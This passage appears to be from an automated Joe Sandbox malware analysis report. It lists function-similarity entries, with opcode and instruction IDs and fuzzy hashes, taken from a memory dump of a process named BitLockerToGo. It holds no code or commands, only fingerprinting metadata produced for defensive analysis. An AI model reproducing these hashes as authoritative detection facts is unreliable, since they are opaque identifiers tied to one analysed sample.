                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 96f01cf5a4a5fbc66146bff0ed73f2f4746840b49c526372884732bc62a942db
                                                                                                                                                                                                            • Instruction ID: e7deeb4d23eb94cd92ae027c1703fd029eee9cb96ffdb6be6668117e96043695
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96f01cf5a4a5fbc66146bff0ed73f2f4746840b49c526372884732bc62a942db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B71AF72605F808BD3289B398895397BBE2AFDA324F18CB6CD5FE873D5D63864058711
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: b9d65a63d55dc101dab8d648e93d62fc17e84a733771b803c98110a43d2c3e35
                                                                                                                                                                                                            • Instruction ID: a4a710428683e853f361a46b908238cf8c95490b240be794243bc07d83d7b904
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9d65a63d55dc101dab8d648e93d62fc17e84a733771b803c98110a43d2c3e35
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82512872B49AD14BD32C8A3C5C202E67A930BE7230B2CC77FE5B18B3E9D5594C428349
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 83e0a7b5798f50e51a594fe464790eb165e5a3dc9801e69e9e1483218ce4d000
                                                                                                                                                                                                            • Instruction ID: 91e01f7b1b83310294adf70ec6e42733a2de4c40d7ccdc23475bec5239df35d2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83e0a7b5798f50e51a594fe464790eb165e5a3dc9801e69e9e1483218ce4d000
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3661E372709F804FD3258A3888943EBBBD25BD6224F598B7DD5FB473C6DA3864068712
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 194e4a91e1514fd88c03bb3a50c0e52568d82f3eb187bc583a51a911f9df439c
                                                                                                                                                                                                            • Instruction ID: 923e9729d5fc7ee5fd359d95a093cefa7cc461975f18bb850f02f0498ccbdfb7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 194e4a91e1514fd88c03bb3a50c0e52568d82f3eb187bc583a51a911f9df439c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2413D32B183604BC724CF39889112BF7D69BCA204F19993EDCD6DB386D634ED068785
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 77174489fd0e67cff2231ae8560aed0271b4bae09d9f29f2eb73219c18e69b4e
                                                                                                                                                                                                            • Instruction ID: d0b61d9f81aa32698d78d86dd344cd119e6c94a8a483ab8c1dfd674f7c89a8c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77174489fd0e67cff2231ae8560aed0271b4bae09d9f29f2eb73219c18e69b4e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2312A34A8A2009BD7198B68D4A193B77E1EF9E704F55183EC08773761C2369C07CB8A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 31087603f6955c680b53001b2ded55fee9e1317aa71b55b8ead82521f35e458b
                                                                                                                                                                                                            • Instruction ID: 8d910ab3725aef525df7cf3e8056221471cb78519a605af281f7b590cc56def2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31087603f6955c680b53001b2ded55fee9e1317aa71b55b8ead82521f35e458b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7518F72E082558BD718CF68CC913AE7BE2AB99314F19C17DC491EB392D63C9901CB85
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 443ba3fedd39c938272fbcc842cb084585534cd99fa60a876ac0daf18ed5a58c
                                                                                                                                                                                                            • Instruction ID: b29ca845dee0bd9e57349eb0122d191b14dd0e5c106a5fdaa3ab53071bb3bc5b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 443ba3fedd39c938272fbcc842cb084585534cd99fa60a876ac0daf18ed5a58c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE512872E046568FEB04CF78CD9139EBBE2AB89314F1EC17DC451AB385DA7C89428B45
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 71a9930f6141a572d33e06cb3c5a38f27cfcee272b5f5079e0f2ab4ef3a0a6f8
                                                                                                                                                                                                            • Instruction ID: 0b4fe86eeb8762ab361a5b54057d890833e111ea9fd28b0abc4707cf8fce0a7e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71a9930f6141a572d33e06cb3c5a38f27cfcee272b5f5079e0f2ab4ef3a0a6f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C417CB2A043006BE7109E15DC41B3BB7A9DFC4704F19543DF98693351D679EC00C69B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
                                                                                                                                                                                                            • Instruction ID: 98624231f7e5e9230921b97ae011ab3bf41f8733fbbdbc26380a3e149101f663
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 893197B01493418BC714DF29D8616ABBBF1EF83364F144A1DE5D28B390E778C881CB8A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0f5569e20424c6e6f711f9c52c94826b675fcb3f1ccbf41507ebb44b243bad6c
                                                                                                                                                                                                            • Instruction ID: c2a8606713259396baf07b6ed49a93c0e34875c4cdcf46c8cf9c9e6fbb1e3583
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f5569e20424c6e6f711f9c52c94826b675fcb3f1ccbf41507ebb44b243bad6c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F331A773B219114BD310CA29CD447A232929BD8328F3E86B9D865DB7D6DD3BAC0386C0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e79d17c13faec7d708a8099df94850abc110ba9db4c1203296f078210758c6b0
                                                                                                                                                                                                            • Instruction ID: 6a11e9d41153ba0da39fccc11c07c22ae059f9e64a2284b904e207afa03c6ec2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e79d17c13faec7d708a8099df94850abc110ba9db4c1203296f078210758c6b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97514D11518FC3AEC326CB7C8C48505EF916A6B13074C879DE0F58BBE6D754A162C3E6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: df0a194b946229767b7363f831e7da5b443bcd7695956afead878a2f9a9ff157
                                                                                                                                                                                                            • Instruction ID: 2de86218718c271af5024ca1516ac4d3c10d72851b4fdaea6f89b2b7420df16b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df0a194b946229767b7363f831e7da5b443bcd7695956afead878a2f9a9ff157
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6831A977E4032807C32C8D7D9C912A5F552ABC8120F2F833ECCAA97782E8744F0A41C4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 9da7e709b599e80dc5169ae302d838208e408c8766e6f691f40b63be7d058f75
                                                                                                                                                                                                            • Instruction ID: 0e1e8af2c2204aea15d5cbc23395958ecdeab842d00133b4e92973e96d65c682
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9da7e709b599e80dc5169ae302d838208e408c8766e6f691f40b63be7d058f75
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 343168327587284FC3209E7CAD8133A76D2EBD5314F5E163AC8A0D72A2E274CD018ACD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 61a7c5f3e3e1a8c8aa4b562ae2fa7e0dfe5b8cfecbd878ad23e9407211e519b2
                                                                                                                                                                                                            • Instruction ID: 8b2346cda91f544e30954989f53522bf0f7333ed1d7757e56fe87add5a417945
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61a7c5f3e3e1a8c8aa4b562ae2fa7e0dfe5b8cfecbd878ad23e9407211e519b2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73117B369483089FD7209F50DC90937B7A2EBA9304F04943DE98523311E2369D109746
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: b67144eb7c8d87826bf8fb626f82679e5028b600b171b9cc6fc605f5a26fb581
                                                                                                                                                                                                            • Instruction ID: 3e731032b9ba81a520a52e62ad974797521f0b7710f777a06b965f9240a14ebe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b67144eb7c8d87826bf8fb626f82679e5028b600b171b9cc6fc605f5a26fb581
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8212474A28601CBD71CCF28C8509BBF7A2EBEB300F59947EC043D32A5E938D485C64A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                            • Instruction ID: 68b9c81565d08f8e27d3b5cdfdde0d7ccd40a41e6fcafbbcd0beb1d44a1560b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06112933A045D40EC31A8D3C8400665BFE30AB7236F5D939AF4B89B2D2D6268DCA8759
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: Variant$ClearInit
• String ID: `$b$d$f$h$j$l$n$x$|$~
• API String ID: 2610073882-2392625418
Similarity
• API ID: Variant$ClearInit
• String ID: `$b$d$f$h$j$l$n$x$|$~
• API String ID: 2610073882-2392625418
Similarity
• API ID: FreeLibrary
• String ID: !$0$v
• API String ID: 3664257935-2983198731
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                            • String ID: v
                                                                                                                                                                                                            • API String ID: 3664257935-2904040280
                                                                                                                                                                                                            • Opcode ID: 7b2bc8b17d6824c900989cbedb41db33d3808025dd827478461ee9e026d6b8e7
                                                                                                                                                                                                            • Instruction ID: e439ef1e48a044a982acff6c66005ba8ca8214f92a7b3c2cab13b027e0846b4c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b2bc8b17d6824c900989cbedb41db33d3808025dd827478461ee9e026d6b8e7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50C0027D981406DFCF012F65FE0E82D3A21BB66346B0400B5A80591275EABB0934BF2B